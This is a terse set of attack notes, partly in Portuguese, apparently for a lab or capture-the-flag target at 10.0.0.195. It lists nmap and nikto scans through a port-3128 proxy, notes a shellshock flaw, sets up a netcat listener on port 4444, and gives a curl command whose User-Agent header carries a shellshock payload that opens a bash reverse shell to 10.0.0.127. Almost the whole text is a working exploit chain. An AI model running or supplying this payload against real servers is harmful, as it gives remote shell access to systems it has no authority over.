sudo su nmap -sS -A -n 10.0.0.195 nikto -h 10.0.0.195 -useproxy http://10.0.0.195:3128 - Vulnerabilidade shellshock - Abrir firefox configurações proxy: Manual 10.0.0.195:3128 - Abrir firefox: 10.0.0.195 10.0.0.195/robots.txt http://10.0.0.195/wolfcms/ - No Kali Linux: nc -lvnp 4444 - Numa nova instância Kali Linux: curl -x http://10.0.0.195:3128 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/10.0.0.127/4444 0>&1" http://10.0.0.195/cgi-bin/status